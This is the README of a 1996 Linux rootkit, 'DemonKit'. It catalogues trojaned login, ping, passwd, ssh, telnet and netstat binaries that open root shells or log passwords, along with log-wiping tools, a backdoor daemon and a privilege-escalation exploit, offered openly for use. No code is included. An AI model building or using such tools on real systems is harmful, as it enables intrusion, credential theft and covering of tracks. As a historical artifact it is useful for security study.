

		   	  Linux DemonKit
			    version 1.9

  	      daemon9@netcom.com/route@infonexus.com
		      alhambra@infonexus.com

			 1996, The Guild

	A collection of Utilities for Linux 1.2.x (possibly 2.x.x kernels as 
	well).  Actually, many of these trojans are portable to other OS's.
	I leave the exercise of determing which ones to the astute reader.
	We assume no responsibility for anything stupid anyone might do.
	
	Use of this kit implies your consent to resolve the authors of 
	liability from any fucked-up situations you may get it.  In other
	words, USE AT YOUR OWN RISK.

	This kit goes out without *extensive* testing.  That is up to you.
	No warranty, expressed or implied is in effect.  Please let us know 
	what you think.  email us.

	You should edit the top level Makefile to change a few things:
	do a `make GodHelpMe` for more info

	Kit History:		
	
	March 22	Started kit with DemonLogin and DemonPing.
	March 23	Added splitvt and SocketDemon.
	March 24	Added Netstat trojan and Banish.
	March 25	Added Demonidentd.
	March 26	finialized code for rumble function in login,
			and added rot47.c to kit.
	March 28	Finalized code for Banish.
	June 30		DemonTelnet added.
	August 30	Makefile created.
	August 29	DemonSSH added. 
	August 29	windexx added.
	September 2	handyman added.
	September 2	DemonPasswd (shadow version) added.
	September 10	Changed Shadow suite things...
	October 	DemonTCPd...
	October 	DemonPGP...
	October		DemonInetd...

	Kit Contents:

	DemonIdent	Enter sekret arguments, and an SUID root shell
			is created in /tmp.
			Trojaned by Alhambra.

	DemonInetd	Drop ya to a shell... Pending...
			Trojaned by daemon9.

	DemonLogin	Trojaned login to drop you to a (root) shell if 
			proper login and passwd are given.  Optional
			code to log all other username/passwd duos and
			spit them to a file, encrypted. (Note that
			encryption algo 'rot47' is merely for obfuscation, 
			not security.  It can be broken by a cryptographer
			by hand with 47 well chosen characters.)
			Trojaned by daemon9.

	DemonPing	Trojaned ping to drop you into a root shell if
			the proper argument is given.
			Trojaned by daemon9.

	DemonPGP	More academic then useful.  But you never know...
			Pending...
			Trojaned by daemon9.

	DemonTCPd	Ohhh!  Donut wrap me!  Donut log me either!
			Pending...
			Trojaned by daemon9.			

	DemonShadow	Where the shadow suite is kept.
		login	Drops you to a r00t shell if proper login name is 
			given.
	 	passwd	Drops you to a r00t shell if proper passwd is given.
		su	Drops you to a r00t shell if proper environment var 
			is set.
		chsh	Drops you to a r00t shell if proper environment var 
			is set.
		chfn	Drops you to a r00t shell if proper environment var 
			is set.
			Trojaned by daemon9.	

	DemonSSH	Dumps remoteusername, password, and target site 
			to a file.  Uses rot47 for obfuscation.  Also drops
			you to a root shell if a certian environment var is 
			set.  May need to be reconfigured via the `configure`
			shell script, but, maybe not.  I leave a cached 
			config.h in there which may serve to speed things up
			(but the compliation takes dayz).
			Trojaned by daemon9 and Alhambra.

	DemonTelnet	Keeps a log of username/passwd/site triplets
			Trojaned by Alhambra.

	Banish		Selective erasure from system logfiles.  Allows
			you to speficy how far back you want to erase
			a specifed login from the wtmp.  Clears utmp
			and lastlog as well.
			Coded by daemon9.

	Handyman	Simplifies the installation process.  Backs up
			all the original programs and installs the trojans
			complete with the same permissions and time
			information as the originals.  Inspired by the fix.c
			from the Linux rootkit.
			Coded (modified) by daemon9.

	Netstat		Trojaned netstat to cloak a specified UID, 
			connection, port &/or socket.  Taken from the 
			Linux rootkit.
			Trojaned by IRA.

	Rot47.c		Companion program to decrypt the rot47 encrypted
			login/passwd file for the SSH and login trojans.
			Coded by daemon9.

	Sniffit		Very nice packet sniffer.  Newest patchlevel 0.3.2
			Coded by Brecht Claerhout <coder@reptile.rug.ac.be>

	Splitvt		The ASR splitvt exploit.  Drops you into a
			root shell via the poorly written SUID root
			program splitvt(1). 
			Coded by Dave G. & Vick M.

	SocketDemon	Robust, but easily spottable daemon that sits
			on an arbitrary port and waits for an
			authenticated connection.  Spawns a root
			shell (or executes commands).
			Coded by Pluvius.

	Windexx		Simple Shell script to erase yur presense from the
			ASCII logfiles.  Needs to be edited.
			skripted by daemon9.


EOF
